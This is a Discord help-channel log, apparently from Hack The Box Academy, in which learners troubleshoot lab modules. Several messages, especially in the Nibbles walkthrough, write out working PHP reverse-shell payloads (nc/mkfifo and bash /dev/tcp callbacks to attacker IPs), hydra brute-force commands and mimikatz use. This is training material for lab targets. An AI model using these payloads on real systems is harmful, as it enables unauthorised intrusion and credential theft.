If i'm www-data, how can I view this file "-r-------- 1 gigi gigi 39 Mar 2 2022 flag.txt"?
#modules
proven raft
steady charm
what?
cloud urchin
If i'm www-data, how can I view this file "-r-------- 1 gigi gigi 39 Mar 2 2022...
cat the file. if you provided more context you can get more help, like what module/question you're on.
steady charm
If i'm www-data, how can I view this file "-r-------- 1 gigi gigi 39 Mar 2 2022...
only gigi can view that
proven raft
cat the file. if you provided more context you can get more help, like what modu...
I get cat: flag.txt: Permission denied
steady warren
@steady charm m telling that which one will u prefer hacking or cyber security
cloud urchin
I get cat: flag.txt: Permission denied
Sounds like you need to escalate your privileges or get creds to the file owner
proven raft
only gigi can view that
I tried to switch users and the machine lags
steady charm
<@147062222378631168> m telling that which one will u prefer hacking or cyber se...
you are asking which one I prefer, food or potatoes?
hacking is part of cyber security
steady warren
Nah nah @steady charm it may be similar but has different works cs go for only finding ways to defend and hacking exploits and do hacking
proven raft
Sounds like you need to escalate your privileges or get creds to the file owner
through this command "su - gigi" ?
cloud urchin
through this command "su - gigi" ?
no idea because you still didn't say what module you're on
steady charm
through this command "su - gigi" ?
you don't need the "-"
just su gigi but you need the password
proven raft
no idea because you still didn't say what module you're on
prolab
steady charm
Nah nah <@147062222378631168> it may be similar but has different works cs go fo...
you have a tv shows/movies view of hacking. ETHICAL hacking is part of Cyber Security π it's the first step in improving resilience
proven raft
no idea then, probably need to ask in the appropriate prolab channel
okay, thanks anyway
acoustic owl
prolab
best to ask in #1263635449335910531
zealous rune
hi, i'm having some issues connecting via xfreerdp to the target in the module section "Internal Password Spraying from Windows" in the Attacking AD module
dim wolf
Nah nah <@147062222378631168> it may be similar but has different works cs go fo...
hacking is a subset of cybersecurity, doesn't make any sense to ask to choose between cybersecurity and hacking. should probably continue this conversation in #general
steady warren
@steady charm nope it's like Bug Bounty and pen testing bug Bounty only goes for finding big and report but pen testing find vulnerabilities and resolves them
They r both alike but different
zealous rune
The xfreerdp command executes fine I get a cert warning and then my client attempts to connect but I get black screen instead of interface to the target
steady charm
hacking is a subset of cybersecurity, doesn't make any sense to ask to choose be...
yeah this is not a module conversation and definitely not one worth entertaining
steady warren
@dim wolf now who r u to interrupt
dim wolf
a moderator of this discord server
steady charm
Also very poor attitude my dude π
cloud urchin
The xfreerdp command executes fine I get a cert warning and then my client attem...
press space bar at the black screen to wake the pc up
steady warren
This all is being such a drag
dim wolf
this is not the channel to be discussing stuff not related to Academy modules, if you want to continue you may do so in #general
steady warren
Who cares
quiet trout
signal to noise, we need this space reserved for people who are actively working the academy
quiet trout
and those who wish to help
steady warren
I am directly redirected to this chat
acoustic owl
I am directly redirected to this chat
cloud urchin
bro you can continue the conversation just in the appropriate channel 2 mods told you now.. just move the convo there so you don't get banned or something
this channel is like a library for studying not general talk
median gale
Should it be a common password, rock you would have found it already so I guess it is somewhere in the system ?
Any other hint anyone ?
muted kindle
Any other hint anyone ?
Are you looking for something like crackstation
fathom pendant
No
fathom pendant
Any other hint anyone ?
There should have been a password list you created
fathom pendant
The xfreerdp command executes fine I get a cert warning and then my client attem...
Press enter
median gale
Are you looking for something like crackstation
This is waht they call rainbow attack right? Although i liked it cracstation doesnt support salted passwrods
median gale
There should have been a password list you created
There are many, are you talking about crafting one for will in particular?
fathom pendant
There's not many you would have created
You attained will's password from the previous section
median gale
Why will's password be of any match to kira's possible passwrods though?
fathom pendant
Each user has a unique password
zealous rune
Press enter
goddam it worked π
fathom pendant
goddam it worked π
It's literally something people have asked about a million times
zealous rune
yeah normally i search the messages... i didn't this time π
hollow frigate
Does anyone know if there will be any artwork for the new modules? I just finished the API Attacks module and noticed that it has a question mark badge.
median gale
Does anyone know if there will be any artwork for the new modules? I just finish...
That is the artwork.
fathom pendant
Does anyone know if there will be any artwork for the new modules? I just finish...
They'll be added eventually
Usually 6+ months after they're released
median gale
You can see the artist message behind it to becurious, like realy curious
quiet trout
maybe i need to actually pull the keys?
ok i see, the describe cmd doesnt actually list column info
fathom pendant
For union to work, you need to have the same number of columns
quiet trout
yeah i thought the describe cmd listed columns, any way to do that without a select statement?
fathom pendant
The 2 columns from one are dept_no and dept_name
quiet trout
or is that just the way to do it?
fathom pendant
quiet trout
nvm chatgpt got me sorted'''' show columns from table;
oh... cols are the rows with describe
wet aspen
am facing the same issue
can someone help with this ?
`dig axfr @10.129.203.6 inlanefreight.com
; <<>> DiG 9.18.16-1-Debian <<>> axfr @10.129.203.6 inlanefreight.com
; (1 server found)
;; global options: +cmd
; Transfer failed.
`
been trying so many ways to fix this ... but non working
fathom pendant
`dig axfr @10.129.203.6 inlanefreight.com
; <<>> DiG 9.18.16-1-Debian <<>> axf...
If you read further the issue was resolved. Use subbrute
wet aspen
yup i did it
fathom pendant
So you found the x.inlanefreight.htb?
cloud urchin
make sure you use the right ip in the resolvers.txt
fathom pendant
That too
wet aspen
So you found the x.inlanefreight.htb?
the subdomains right ?
fathom pendant
Yes
wet aspen
make sure you use the right ip in the resolvers.txt
i used the one the ip that was provided
fathom pendant
So dig that subdomain
fathom pendant
using the @ip
wet aspen
yup i did it
cloud urchin
if it doesn't allow a trasnfer you may need to brute force it like marcielee said
fathom pendant
Assuming you didn't mess with the names.txt
quiet trout
if this is the module i think it is, have you checked the BIND configs?
cloud urchin
make sure /etc/hosts doesn't have anything in it
acoustic owl
So you did
`dig axfr subdomain.inlanefreight.htb @ip` on each found one?
Did you use the target IP of the module?
wet aspen
`dig axfr @10.129.203.6 blog.inlanefreight.com
; <<>> DiG 9.18.16-1-Debian <<>> axfr @10.129.203.6 blog.inlanefreight.com
; (1 server found)
;; global options: +cmd
; Transfer failed.`
cloud urchin
yeah so it found the server and failed the axfr
wet aspen
make sure /etc/hosts doesn't have anything in it
yup did that as well
acoustic owl
`dig axfr @10.129.203.6 blog.inlanefreight.com
; <<>> DiG 9.18.16-1-De...
htb or com?
fathom pendant
Rerun subbrute using inlanefreight.htb instead
wet aspen
alright imma update u
yo i got the flag ... thx alot guys, just a simple mistake i did
novel lynx
yo i got the flag ... thx alot guys, just a simple mistake i did
been there, done that, got the t-shirt (as marcie would say)
nova ocean
hi guys i am stuck in Attacking Common Services can anyone help me?
barren rose
Hello everyone, I just finished Windows Event Logs & Finding Evil module and i would have a question regarding the last question in the Skills Assessment, not sure I really understand why the answer is the answer ...
quiet trout
The syntax used here on the BBH -> Sql Injection Fundamentals -> DB Enum Module: https://academy.hackthebox.com/module/33/section/217
Is this php syntax or mysql? module doesnt specify the reasoning behind its origin or use. too narrow for chat gpt to be of help.
im leaning php? as database() was previously used, but im only half sure that database() itself is php.
fathom pendant
im leaning php? as database() was previously used, but im only half sure that da...
It's the syntax you'd write in the search field
nova ocean
hi guys i am stuck in Attacking Common Services can anyone help me? i am doing skill assessment easy but i cant find nothing any hint?
fathom pendant
hi guys i am stuck in Attacking Common Services can anyone help me? i am doing...
Scan for services first
quiet trout
sure, but i dont recognize that convention we've previously used things like standard sql syntax in the search field... and stuff like INFORMATION_SCHEMA... and TABLE_SCHEMA... nothing with a function or db.table notation
fathom pendant
sure, but i dont recognize that convention we've previously used things like sta...
You're injecting an sql command into the search query
fathom pendant
what list should i use the one in resources?
Generally, yes
nova ocean
i got a user from smtp enum but i did use pws.list and found nothing on ftp,rdp,smtp
and used also the usernames.list and nothing
is it bug?
fathom pendant
Lower
The password isn't deep on the list, so don't worry about it potentially taking forever
fathom pendant
You don't need to be able to see the answers to arrive at the solution
nova ocean
yea sometimes u stuck dont know what ur doing wrong
fathom pendant
In general; if cracking the password yields an error, or is taking > 20-30 minutes you're likely doing something wrong
quiet ledge
when first starting out via the starting point, are the walkthroughs for you to go along and learn or more of just information?
nova ocean
In general; if cracking the password yields an error, or is taking > 20-30 minut...
yea probably wrong list
fathom pendant
when first starting out via the starting point, are the walkthroughs for you to ...
For starting-point, the walk-throughs are fine to follow, also read and follow #welcome to access #starting-point
median gale
It is asking a lsass dump right?
nova ocean
is pws.list is the correct list for this assessment easy?
fathom pendant
Rockyou is fine
nova ocean
thanks
fathom pendant
It is asking a lsass dump right?
It's asking you to perform what's shown
Also; make sure to run cmd/powershell as admin before running mimikatz
nova ocean
marcielee how long it took u to remember all answers XD
ur pretty good
median gale
It's asking you to perform what's shown
This is not what is shown in this module, mimikatz is shown to run a proccess as another user by why do this to extract hashes when we are already logged in as admin ?
fathom pendant
This is not what is shown in this module, mimikatz is shown to run a proccess as...
What module?
nova ocean
Failure teaches lessons that success won't
ur amazing
fathom pendant
What section
median gale
pass the hash
fathom pendant
Also you're not using the right dump
median gale
You mean the method used to extract the hashes ? the hash dump ?
fathom pendant
Learning how tools you use work prevents you from being a skid
distant island
i need help with the Command Injections - Skills Assessment
fathom pendant
Did you try injecting the command?
distant island
Did you try injecting the command?
i am still stuck in where exactly is the injection vector
fathom pendant
Mess with all the functionalities of the service
distant island
Mess with all the functionalities of the service
||is it on the search or am i lost||
nova ocean
hi again i am still stuck is my username correct fiona?
still didnt crack that ftp with rockyou
fathom pendant
||is it on the search or am i lost||
It is not
fathom pendant
still didnt crack that ftp with rockyou
Your username is before the @domain
nova ocean
yea i did
nova ocean
Not the whole f*@domaim
hydra -l f**** -P /usr/share/wordlists/rockyou.txt ftp://10.XXX.XXX.X -t2
is taking forever
fathom pendant
That should work or 1 thread
nova ocean
oh ok
fathom pendant
But it shouldn't take long
nova ocean
i lower it to 1
half beacon
@fathom pendant
fathom pendant
<@134323136853311488>
The fuck?
What does any of that have to do with htb academy?
distant island
As I said... mess with the features available.. copy/move...
ok first command the one in the site i managed to excute it
but no signs of mine is being used
fathom pendant
Look for errors π
unique ether
Can a skill assessments in one section can be related to the previous section skills as well?
fathom pendant
You mean a previous skill assessment in the same module?
Generally: no
But it depends
If they are linked, they're highly explicit about it being linked
cloud urchin
i know of at least one that requires prerequisite knowledge from a previous module
fathom pendant
i know of at least one that requires prerequisite knowledge from a previous modu...
Prerequisite knowledge sure, but exfiltrated data is a different thing
muted jacinth
Hey guys, can someone give me a hint for the last question of the skill assessment of the dacl attack II module?
limber pier
Hello everyone, brand new to HTB and pretty raw in IT/Cybersecurity in general (so please forgive my ignorance).
Iβm on the Setting Up module within the InfoSec Foundations course. Am I supposed to be following all the steps concerning downloading all the different apps and setting up VMs? Or is it just a follow through example to give you the idea? Iβm feeling a little overwhelmed with all the apps for notes, VMs, containers,
I was hoping everything I need would be within a pre-set VM image like in the CTF challenges?
fathom pendant
Hello everyone, brand new to HTB and pretty raw in IT/Cybersecurity in general (...
No you don't need to follow every step
You won't find a vm that will contain all the tools
You will generally run into a situation where you'll need to download/install a tool
limber pier
Great, thank you for the fast reply. Iβll download each thing as I find I need it then, that seems much more palatable than staring down the long list of tools and learning how to use them all in one go. Thank you.
fathom pendant
Oh I definitely wouldn't recommend learning the tools all at once
The academy modules generally stick to a handful of tools on a given module
distant island
Look for errors π
i found the error and i managed to bypass the character but still cant move to next step
fathom pendant
i found the error and i managed to bypass the character but still cant move to n...
Keep trying other bypasses
You need to read a file, so... try that
You might need to combine methods
cerulean hinge
Hello,
I'm doing the Skill Assesment for the Active Directory Enumeration & Attack module.
I managed to run sharphound on the victim machine and I want to get the .zip file generated.
Do you guys have advice when it come to retrieve a file from the victim machine and upload it to our kali ?
I have a meterpreter shell but the download command is not working.
muted jacinth
Hello,
I'm doing the Skill Assesment for the Active Directory Enumeration & Att...
evil-winrm with the download command
cloud urchin
there are many ways. a share via rdp is easy. you can scp with powershell. you could also just create an smb share.
cerulean hinge
Ok thanks for the advice I will try them
muted jacinth
Ok thanks for the advice I will try them
you can also set up an smb share with impacket. usually very functionnal
cerulean hinge
Thanks. I managed to get my .zip file but I will note your advices, it will definitly help me again π
cloud urchin
there's also a whole module on file transfers
cerulean hinge
It's in my ToDo list !
muted jacinth
I swear to fkn god they're giving hints like enigma "Search for rights in non-common locations where you can control everything.". like yeah dude thx. "keep searching"
asking you to only use what you learned in the module, what a joke
distant island
You might need to combine methods
so hard
fathom pendant
It's in my ToDo list !
It's fairly early on in the pentester job role path (if you're doing that)
distant island
It's fairly early on in the pentester job role path (if you're doing that)
i solved it what crazy challenge ngl
steady charm
I am going to go crazy, spend a few good hours doing the AD Assessment 2 just for the DC to crap out at the last step. Insane...
muted jacinth
I Think i will guenuinely give up for this dog shit ass module. If anyone ever accomplish to solve the DACL attack II skill assessment i would gladly discuss on how you're a litteral god. until then
steady charm
OH NVM THE FREAKING VM'S CLOSED THEMSELVES.........asdasdasdjhasjdasjdsa
fathom pendant
I am going to go crazy, spend a few good hours doing the AD Assessment 2 just fo...
Timers do that to you
steady charm
too bad I forgot about the timer existence, the assessment was too good. fully immersed
but this sucks...literally at the last step. all I had was to psexec inside the DC
limber river
but this sucks...literally at the last step. all I had was to psexec inside the ...
if you saved the hash or the ccache file , you will get DC directly
steady charm
Yup I am done
Just annoying I had to restart ligolo
One module left and I'm finally done
cerulean hinge
It's fairly early on in the pentester job role path (if you're doing that)
I was trying the AD module as I needed to learn more about this subject and it's really great. I will propably do the whole pentester job role path once i'm done with this module.
fathom pendant
The pentester path builds off skills in itself
fickle topaz
how guys!!!
tender nimbus
Hey guys quick question about smtp enum ^^ #red-team message
vagrant osprey
yall i am TWEAKING for real
real delta
Hey guys quick question about smtp enum ^^ https://discord.com/channels/47376031...
don't put it in that channel, put the help you need on a module here
vagrant osprey
Getting Started --> Nibbles Initial Foothold
I cannot get into the shell. I have literally been trying on and off for WEEKS and youtube walkthroughs are only confusing me more, i can't get past the part where you curl the myimage webpage
please please please can someone help me figure out why on earth a shell won't come up
real delta
Getting Started --> Nibbles Initial Foothold
I cannot get into the shell. I hav...
ask in #starting-point
tender nimbus
module: footprint
trim frost
ask in <#691583669374025802>
it looks like it is an academy module
ocean night
Again, please do not share screenshots like that for modules over Tier 0.
real delta
it looks like it is an academy module
is nibbles not a starting point machine?
tender nimbus
Again, please do not share screenshots like that for modules over Tier 0.
Is there a reason?
trim frost
is nibbles not a starting point machine?
maybe but its also in academy?
vagrant osprey
is nibbles not a starting point machine?
its in the Getting Started module, im not sure if that counts as starting point
ocean night
Because posting potential spoilers for modules over Tier 0 is not allowed.
tender nimbus
Because posting potential spoilers for modules over Tier 0 is not allowed.
Oh okej sorry
ocean night
Try and ask your question without posting such screenshots.
real delta
its in the Getting Started module, im not sure if that counts as starting point
starting point machines are on the labs platform
real delta
its in the Getting Started module, im not sure if that counts as starting point
my bad then
vagrant osprey
starting point machines are on the labs platform
trim frost
Getting Started --> Nibbles Initial Foothold
I cannot get into the shell. I hav...
so you think you uploaded the file and then nothing? you can't access it or you can access it but can't do anything with it?
vagrant osprey
my bad then
you're good, i was just confused π
tender nimbus
So can someone help me for smtp username enumeration? i already use some commands but all the usernames i tried were wrong
vagrant osprey
so you think you uploaded the file and then nothing? you can't access it or you ...
it doesn't connect
trim frost
so is the php file there though? you are listening for it but the webpage exists?
tender nimbus
if i remember if you image is uploaded try to refresh you browser π
vagrant osprey
yes, the php file uploads
tender nimbus
while opening a listner
trim frost
so you have the listener open, you go visit the php page and nothing happens?
vagrant osprey
yes
i tried both by refreshing the page and by curling it, neither time does any shell start
trim frost
and the php page has your IP for tun0 and your port for the listener? 9443 or whatever?
vagrant osprey
it should, how can i check?
trim frost
look at the php file you upload?
foggy monolith
Check to make sure you have the IP address of the PHP reverse shell set to match the IP address of your attack machine. Keep in mind that when you're doing a reverse shell, the target is the client and the attacker is the server.
trim frost
yes, so you upload a php file, it has your tun0 IP and the port (9443 in that example), you go visit the PHP file you uploaded, and that works?
vagrant osprey
what is the tun0 IP, the target machine w nibbles on it right?
if so, then yeah that's the one
trim frost
its your IP, if you are using your own VM, it is tun0
foggy monolith
Read the PHP code and check to make sure you have the PwnBox IP address in it, because you want it to connect back to you.
trim frost
if you are using the pwnbox, I'm not sure
vagrant osprey
yes, so you upload a php file, it has your tun0 IP and the port (9443 in that ex...
i go to the php file, i get a blank page which i assume is what it's supposed to look like
woeful elbow
Hi
trim frost
ok but you upload the file, what is the IP and port in the php file you upload? it should be the attacker (aka you) IP and the port you are using for your reverse shell
vagrant osprey
in the file it says
<?php
system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.129.193.209 9443 >/tmp/f");
?>
with the ip being the target machine
foggy monolith
in the file it says
<?php
system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh ...
Incorrect. You need the IP address there to be the attack machine IP.
trim frost
basically you are telling the webserver, "connect back to me" and giving it the IP of wherever you put nc -nvlp 9443
vagrant osprey
aka if you are using the pwnbox, it is the pwn box ip
alright, i changed that to the pwnbox ip
tender nimbus
So can someone help me for smtp username enumeration? i already use some command...
someone has an idea?
tender nimbus
someone has an idea?
this is the command i tried: smtp-user-enum -U Downloads/footprinting-wordlist.txt -t 10.129.110.187
trim frost
this is the command i tried: smtp-user-enum -U Downloads/footprinting-wordlist.t...
what module is this?
vagrant osprey
alright, i changed that to the pwnbox ip
i did the lc -lvnp 9443 in cmd line and refreshed the page, it still isnt doing anything
as in, i'm still not getting the cmd line connection
trim frost
and you reuploaded your php file?
vagrant osprey
that would be what a person with common sense would do, isn't it π
one moment lemme do that lol
trim frost
π€£
trim frost
Footprinting
oh I haven't done that yet, so unsure but I'd say answers are very finicky and don't like spaces
foggy monolith
that would be what a person with common sense would do, isn't it π
The clue is in the name: "reverse" shell. You're telling the target server "I'm in charge now" and telling it to bring the shell to you.
vagrant osprey
ok i reuploaded the php and tried the steps again, still no response on the cmd
foggy monolith
Check to make sure that you don't have 2 PHP pages on the target. Reuploads cause duplicates.
trim frost
yeah maybe name it something else
foggy monolith
The server doesn't overwrite anything. You need to make sure to point it at the new file name.
Also, always re-run Netcat before loading the new target page, because Netcat is just listening for connections from the target.
trim frost
also you could try other shells too, this is the one I commonly use
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/"<attacker ip>"/8888 0>&1'");?>
vagrant osprey
yeah maybe name it something else
still nothing π«
vagrant osprey
Also, always re-run Netcat *before* loading the new target page, because Netcat ...
yes
vagrant osprey
also you could try other shells too, this is the one I commonly use
<?php exec("...
i will try this
foggy monolith
Alright, try resetting the target machine and going from there.
trim frost
yeah that is true, a reset is a good idea if you have been doing something and it is still failing
foggy monolith
i will try this
Also, is there any "Connection from" messages in the Netcat terminal? If so, then you actually do have a shell β by default, you won't see any shell prompts and need to actually run some commands like source /etc/bash.bashrc to actually get a prompt on the target.
vagrant osprey
i will try this
didn't work
vagrant osprey
Also, is there any "Connection from" messages in the Netcat terminal? If so, the...
nope, it stays on
listening on [any] 8888 . . .
9443 when i used the previous one
trim frost
so you tried mine, you put in the IP of the pwnbox and nothing?
safe star
i just tried it with this and it worked rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc <attacker ip> 4444 >/tmp/f
vagrant osprey
i will try that
trim frost
that is your original one
safe star
hmm
vagrant osprey
my brain is fried from nibbles but i refuse to sleep tonightuntil i get past it
nibbles will torment me no longer
safe star
are you using the pwnbox only?
vagrant osprey
yes
whole grotto
For revshells use revshells.com
safe star
oh no, you had system
yeah i forgot to copy that part
vagrant osprey
i just tried it with this and it worked ```rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|s...
this within system(""), right
safe star
yes
yeah <?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc <IP> 4444 >/tmp/f'); ?>
vagrant osprey
ok yeah ty
trim frost
yeah that, you'll need to make sure whenever you doing a reverse shell as a php page you upload, you start it with <?php and end it with ?>
vagrant osprey
nope still no connection
trim frost
ok so I hate to say it but can you do an ifconfig on your pwnbox and show it here?
safe star
its in this directory right? /nibbleblog/content/private/plugins/my_image
vagrant osprey
ok so I hate to say it but can you do an ifconfig on your pwnbox and show it her...
yeah
trim frost
ok so it is tun0
safe star
what does your php file look like?
vagrant osprey
no it has this
<?php
system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 94.237.59.46 4444 >/tmp/f");
?>
short hearth
Hey guys, I am new to Discord, and currently stuck on the 'Pivoting, Tunneling & Port Forwarding' module. Specifically, I cannot connect to the rdp as I keep getting the following error: "xfreerdp /v:172.16.5.19 /u:victor /p:pass@123
[18:37:29:387] [215271:215272] [ERROR][com.freerdp.core] - freerdp_tcp_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_FAILED [0x00020006]
[18:37:29:387] [215271:215272] [ERROR][com.freerdp.core] - failed to connect to 172.16.5.19
".
This is form the 'Dynamic Port Forwarding with SSH and SOCKS Tunneling' chapter of the module, any suggestions?
trim frost
so nc -lnvp 4444
vagrant osprey
yes
trim frost
and <?php
system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.15.228 4444 >/tmp/f");
?>
vagrant osprey
yes
trim frost
and you uploaded as new file name?
vagrant osprey
yes
trim frost
and you go to that in the webpage and /shell.php
and you get a blank page?
(if shell.php is what you named it that is)
vagrant osprey
yes
wait
is it supposed to show something other than image.php? because every time i upload a new thing it stays as image.php on the site, but the size of the file changes
safe star
so u have no other vms open?
trim frost
so the page you visit is the one you upload
so if you upload shell.php, you go to that page, not the page where you upload files
safe star
is it supposed to show something other than image.php? because every time i uplo...
yeah its image.php and the xml file
trim frost
where is the file you uploaded?
vagrant osprey
where is the file you uploaded?
trim frost
so yours is imagemy.php?
vagrant osprey
most recent is zoi.php
vagrant osprey
where would i see it? it's not in this
trim frost
http://nibbleblog/content/private/plugins/my_image/ is where it should be, so then yours would be http://nibbleblog/content/private/plugins/my_image/zoi.php as the page you visit
safe star
nah the box renames the file to image.php
trim frost
Yeah I'm reading the walkthrough now
so then you do access image.php and then nothing happens?
vagrant osprey
<?php
system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.15.228 4444 >/tmp/f");
?>
no way
a freaking
trim frost
try the original again
<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 9443 >/tmp/f"); ?>
trim frost
I am wondering if you do need /bin/sh vs sh
you will be a reverse shell master after this tho
vagrant osprey
OMG
trim frost
got it?
trim frost
hey look at you
vagrant osprey
no hopes up yet
safe star
what did you change
vagrant osprey
have to finish this through first before celebrating
vagrant osprey
what did you change
i had .28 instead of .228
π«
moment of truth
you are literal angels oh my god
cannot thank yall enough
i get to sleep tonight 
trim frost
onwards and upwards
trim frost
gotta get root now
vagrant osprey
by "your ip" which ip is it referring to? i tried the target and the 10.10 one
got connection refused 404 on the first and just 404 on the second
trim frost
so your ip is the 10.10
you have to start a webserver on port 8080 on the pwnbox
and have LinEnum.sh in that directory of where you start the webserver
vagrant osprey
so your ip is the 10.10
404
vagrant osprey
you have to start a webserver on port 8080 on the pwnbox
does it explain how to do this somewhere or is that an independent figure-out thing
trim frost
does it explain how to do this somewhere or is that an independent figure-out th...
yes, its on the privilege escalation page
vagrant osprey
yes, its on the privilege escalation page
grassyass
floral loom
[Help information gathering - web edition - Skill assessment]
Hello everyone, i'm facing trouble with finding the API key, although I already have the full subdomain AND also the admin directory.
I can't access it via browse, nor via curl.
I have all the other flags, but this one is killing me. Anybody could help me, please?
vagrant osprey
I'm new here and I would like to learn about computing π
godspeed, computer glitch username
solar kestrel
godspeed, computer glitch username
π ty
quiet trout
finishing up the assesment on BBH -> SQLi fundamentals -> SQL Assesment and we're thrown a bit of a curveball at the end, not sure how one is to ascertain the current working directory to write to, and how that even matters when root has perms to write wherever...
|| here's roots secure_file_priv contents ||
vagrant osprey
no. nonononononononononononono.
my pwnbox ran out of time and now i don't have access to the nibbles shell????
trim frost
finishing up the assesment on BBH -> SQLi fundamentals -> SQL Assesment and we'r...
so I'm going by memory here but there is a mention of reading a file to get where the www root is, right?
floral loom
[Help information gathering - web edition - Skill assessment]
Hello everyone, i'm facing trouble with finding the API key, although I already have the full subdomain AND also the admin directory.
I can't access it via browse, nor via curl.
I have all the other flags, but this one is killing me. Anybody could help me, please?
quiet trout
so I'm going by memory here but there is a mention of reading a file to get wher...
oh thats a good idea...
trim frost
that one, I don't remember Camil (maybe I should take better notes)
floral loom
that one, I don't remember Camil (maybe I should take better notes)
Thank you anyway for answering, Zojja π
quiet trout
that one, I don't remember Camil (maybe I should take better notes)
just put some 'speck on your name.
trim frost
if I can figure out this sqlmap assessment, I can go look π€£
vagrant osprey
my pwnbox ran out of time and now i don't have access to the nibbles shell????
we gucci we gucci i got it figured out
quiet trout
gucci mayne!
floral loom
if I can figure out this sqlmap assessment, I can go look π€£
π€£ π€£ okkk, thanks!!
trim frost
awesome
floral loom
just put some 'speck on your name.
i never realized that the @ at the end of my nick name is not a good ideia, indeed kkkkk thanks for pointing out!
vagrant osprey
Getting Started --> Nibbles - Privilege Escalation
I just did wget http://10.10.15.228:8080/LinEnum.sh and got a GET 404 on the other terminal. what could cause this?
cloud urchin
a 404 error means it couldn't find the file requested
safe star
Getting Started --> Nibbles - Privilege Escalation
I just did wget http://10.10...
did you run python3 -m http.server?
cloud urchin
a 404 means the server is up, and the server responded saying it couldn't find the file or page
vagrant osprey
did you run python3 -m http.server?
yes
safe star
is the file in the directory you ran it?
vagrant osprey
a 404 means the server is up, and the server responded saying it couldn't find t...
what could cause it to not be able to find the file or page
vagrant osprey
is the file in the directory you ran it?
wdym
safe star
linenum has to be in the same directory as the http server
trim frost
is the LineEnum.sh file in the same directory you ran python3 -m http.server?
trim frost
ok so on the pwn box, you typed 'python3 -m http.server', right?
vagrant osprey
yes
cloud urchin
https://academy.hackthebox.com/module/77/section/853
the file, LinEnum.sh, must be in the same directory you used your python http.server command
vagrant osprey
sudo python3 -m http.server 8080
on pwnbox
wget http://10.10.15.228:8080/LinEnum.sh
on shell
safe star
i dont understand, im sorry
put your webserver ip in firefox and check to get a better understanding
if linenum isnt in there then the file cant get downloaded
trim frost
so where is the LinEnum.sh file ? what directory did you type 'sudo python3 -m http.server 8080'?
vagrant osprey
so where is the LinEnum.sh file ? what directory did you type 'sudo python3 -m h...
ohhhhh, /Desktop
trim frost
so then your LinEnum.sh file will also need to be on Desktop
vagrant osprey
nibbler doesn't have a desktop
safe star
wym
trim frost
not on nibbler, on the pwnbox
you are trying to transfer a file from the pwnbox to nibbler
vagrant osprey
in /home/nibbler, i did the wget
in ~/Desktop, i did sudo python -m http.server
trim frost
ok so the file on the pwnbox you want to transfer to nibbler, has to be in ~/Desktop
safe star
paste this in firefox http://10.10.15.228:8080/
vagrant osprey
nope nvm i dont
safe star
u will understand
vagrant osprey
paste this in firefox http://10.10.15.228:8080/
unable to connect
safe star
are you sure its 8080?
vagrant osprey
yes
trim frost
ok firefox on the pwnbox
vagrant osprey
yes
trim frost
if you type that in, you get unable to connect?
rustic sage
@signal shell
vagrant osprey
if you type that in, you get unable to connect?
rustic sage
Do you need help with elastic stack still?
trim frost
ok, so on your terminal with the sudo python3 -m http.server, do you see attempted connects?
trim frost
ok so anyway, you are starting a webserver from your ~/Desktop
you want to transfer a file from ~/Desktop to nibbler
so you have to ensure that file is in the ~/Desktop folder
safe star
now there's a 200
you get what we mean now?
vagrant osprey
you get what we mean now?
no
safe star
you dont see any files in firefox?
trim frost
so do you have LinEnum.sh somewhere on your pwnbox?
you might have to go find it (google or what not) if not
vagrant osprey
vagrant osprey
you dont see any files in firefox?
there are files
safe star
is linenum in there?
trim frost
on pwnbox, not on nibbler
vagrant osprey
is linenum in there?
no
vagrant osprey
on pwnbox, not on nibbler
none that i see, but im not sure where to look
safe star
then u have to start the server where linenum is
vagrant osprey
i have to go, ill pick up with this tmrw
thank yall so much for your help, i really appreciate it
fathom pendant
trim frost
thank yall so much for your help, i really appreciate it
ok, it looks like the other module used linpeas, so you will have to go download LineEnum
trim frost
none that i see, but im not sure where to look
and so you don't get in trouble, check out this page, it has a link to where you can get LinEnum.sh https://book.hacktricks.xyz/linux-hardening/privilege-escalation
novel lynx
Pivoting, Tunneling, and Port Forwarding/Web Server Pivoting with Rpivot. When I run this command on my attack host should i be getting feedback, or is it supposed to be waiting? python2.7 server.py --proxy-port 9050 --server-port 9999 --server-ip 0.0.0.0
safe star
can you talk to the internal network?
novel lynx
can you talk to the internal network?
what does that mean?
safe star
when u connect the client to the server
i cant remember if there is supposed to be output but the the best way to check would be to connect to the server and try to talk to the internal network
novel lynx
fathom pendant
and so you don't get in trouble, check out this page, it has a link to where you...
It's funny bc it's not that needed to figure out the privesc vector for the getting started - nibbles sections
trim frost
It's funny bc it's not that needed to figure out the privesc vector for the gett...
ahh I think the walkthrough has it tho
fathom pendant
The module walks you through it
safe star
so when i run the server.py, nothing happens, and then when i run client.py on t...
trying rn
fathom pendant
ahh I think the walkthrough has it tho
If it does, then there should be a link in the module
trim frost
If it does, then there should be a link in the module
yeah should be
I mean for people that are totally new, seems confusing to them
fathom pendant
99.9999% of the time, if a tool was mentioned that's from github or not in apt, then it's a link in the module/reading
trim frost
I had to go check the module to see, they use Linpeas in another section but then mention downloading LinEnum through a python webserver
fathom pendant
Imo it's easier to just have people see what they can [su]do
safe star
so when i run the server.py, nothing happens, and then when i run client.py on t...
i got "New connection from host ..."
fathom pendant
Linpeas and linenum just spit a lot of noise which can be very much counterproductive
novel lynx
i got "New connection from host ..."
on your attack box?
trim frost
true
safe star
on your attack box?
yeah
fathom pendant
They're very much tools for more experienced people
novel lynx
what port did you choose 9999 or 9050?
when you run this on your attack box, does it give you any feedback or does it just sit open? python2.7 server.py --proxy-port 9050 --server-port 9999 --server-ip 0.0.0.0
safe star
yeah
until i connect back
i read that wrong
i mean no it doesnt give me anything unless i connect to it
novel lynx
client.py --server-ip 10.10.14.18 --server-port 9999, i think this is the problem then, i should be putting in my attack box ip here huh?
safe star
yes
novel lynx
i get too lost in the sauce with the copy/paste sometimes haha...brb
